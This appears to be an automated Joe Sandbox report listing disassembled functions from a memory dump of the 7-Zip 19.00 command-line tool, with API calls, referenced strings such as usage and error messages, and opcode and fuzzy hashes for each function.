                                                                                                                                                                                                        • API String ID: 2662072562-1527772849
                                                                                                                                                                                                        • Opcode ID: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                        • Instruction ID: da56958079d4c5fe8c2276ad7a2270fa36e2566ff2c5f62c15ac92a54926d42c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5651BE7230590086CE25EB21E69037E73A1FB86BD5F4441F5EE6E43769DF28C949C300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                        • Instruction ID: cdfd18283d658db8f73f23773e5d346842e7321fb58e736e3c8759e61b7e4a95
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4771862231AA8091CA20EB29E49139FA7A0F7C27D1F5451D2FFAD57769DF28C44ACB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • free.MSVCRT ref: 00B8187D
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowfreemalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2861928636-0
                                                                                                                                                                                                        • Opcode ID: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                        • Instruction ID: f526ec6573b2ea8bd2a61a3b91e3586cfcc5114c232ea3396c3dd8cf78deda48
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F812A7730AAC481CA60EB26E450BAF67A4F7D6B85F0154A2DF8E53B15CF38C44ACB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                        • Instruction ID: 6a43bdf6446b5cf705d74e7899ffb4d851a1b11918750c6e3195f5db806573b4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A31C823717D4085CA11BF26DC513AE63A0EB86F96F1901F29F2D6B369CE20C8468754
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: 2$3$?$?$Z
                                                                                                                                                                                                        • API String ID: 1534225298-3338962022
                                                                                                                                                                                                        • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                        • Instruction ID: 0cf3b5dd3999ec021b237805d38130c4f59617f5cd4e09a31a2d026bcb9c2e7b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24C1D633214A8492CA30FB25D48566FB7A1F7D5B84F504293EBAEA3779DE38C949C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                        • Instruction ID: 8b1635a6657d23d52844254abf854f7a78574c066c59e9b164d453672a87627c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51F927703E8489CB25EF36D4A466D67A0FB86F95B1D41B6DF1E2B718CF28C9098350
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$wcscmp
                                                                                                                                                                                                        • String ID: ..\
                                                                                                                                                                                                        • API String ID: 4021281200-2756224523
                                                                                                                                                                                                        • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                        • Instruction ID: b28cb33b2d2b03e83be3a67ef6261afd231523b671d155d1e05874e2001d49d3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16619323715A8086CB20EF16E49031E77A1FBD6B95F5941A2EF5E177A8DF78C846CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free$fputc
                                                                                                                                                                                                        • String ID: Modified: $Path: $Size:
                                                                                                                                                                                                        • API String ID: 2662072562-3207571042
                                                                                                                                                                                                        • Opcode ID: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                        • Instruction ID: dc568a696c0f72593d412a6a7235258a0039a3cd50b865c2691f70ddec44c4ff
                                                                                                                                                                                                        • Opcode Fuzzy Hash: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95214B62315A0295DE10EB25E95436E3321FB96BF9F4482A2EE6D436A5DF2CC95AC300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                        • Instruction ID: 23bf4e2b48383e6b476ff239a486a83a84317ca635eaabed30a836e829cfe8dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10C18123315A8486CA20EF25D49176EA7B1F7CAB42F6441E2EF4E63765CF39C949CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                        • String ID: Incorrect volume size:
                                                                                                                                                                                                        • API String ID: 3957182552-1799541332
                                                                                                                                                                                                        • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                        • Instruction ID: 71d0e44191e85b704868860d84352e3ac7c53347d524031d3d89ff82bfabd31e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59517E73315A8492DF20EF26D8913AEB3A0F785B84F4481A2DF9D47765DF68C549CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                        • Instruction ID: 3fd5050cc18a931a901fae55f537066a81aca1d7aee4320795a449657a809f13
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21716F22349A4081DB10EF25E89436E77E1FB86BD9F4441E2AF5E97765DF28C48AC740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5A90A
                                                                                                                                                                                                        • free.MSVCRT ref: 00B5A9AD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: /$\
                                                                                                                                                                                                        • API String ID: 1534225298-1600464054
                                                                                                                                                                                                        • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                        • Instruction ID: 7b8318af98d81589e85b5686d99b82a48dcab4c618f6193eac2652ff4b11a77a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E51D412305A4090CE21FF21D59137E67E0EB86BD6B4052E1BF4E67765DF28CA4ECB02
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00B98630
                                                                                                                                                                                                        • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00B98640
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$fputs$memmove
                                                                                                                                                                                                        • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                        • API String ID: 2337578458-4238946813
                                                                                                                                                                                                        • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                        • Instruction ID: 966a64ef061f8f6ad173eb8f1229c8bee8d8805f108dcd4b1ac65bcb2845b73d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B112B63306AC196DE20DF15E99036EB362F786B95F5440A2CF5D6B719CF38C89ACB01
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Cannot find listfile, xrefs: 00B5FF12
                                                                                                                                                                                                        • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 00B5FFDA, 00B6000E
                                                                                                                                                                                                        • The file operation error for listfile, xrefs: 00B5FF71
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrow
                                                                                                                                                                                                        • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                                                                                        • API String ID: 4001284683-1604901869
                                                                                                                                                                                                        • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                        • Instruction ID: eacc87fc68c025fe5f6c7a57ebe09f787f693e07e99ac7b4fcf640228bbc31a2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B551D47232878592CA20EB16E8907AFB7A1F7967D4F400192EF9913B59DF7DC909CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 408039514-0
                                                                                                                                                                                                        • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                        • Instruction ID: 3fd5c0f1e4f3889b67584a4f8f4e60bbfcdb6a2b010076a7d0ae71c3e191016c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E851522235D90092DA20EF24F49176EA7A0EBD6792F5011D2BF9E43679DF68CD4ECB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs
                                                                                                                                                                                                        • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                        • API String ID: 1795875747-2836439314
                                                                                                                                                                                                        • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                        • Instruction ID: 93e969093f27db96c3158934b750bf8b75b17cc21cedab1320513da779c8c8e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 021179A6300951A6EF249F26E98536877A0F70AF85F488062CF5903A65DF3CDAA9C301
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free
                                                                                                                                                                                                        • String ID: $ MB$ Memory =
                                                                                                                                                                                                        • API String ID: 3873070119-2616823926
                                                                                                                                                                                                        • Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                        • Instruction ID: 676cc46c2f8f63787be85a6d60974eacf256c09ff206177cde8898f513ab7784
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E211EFA2205902D1EB10DF25E95436A3720F795BE5F449262EE6E437A9DF3CC599C700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B930E7
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B93104
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B93114
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B93132
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
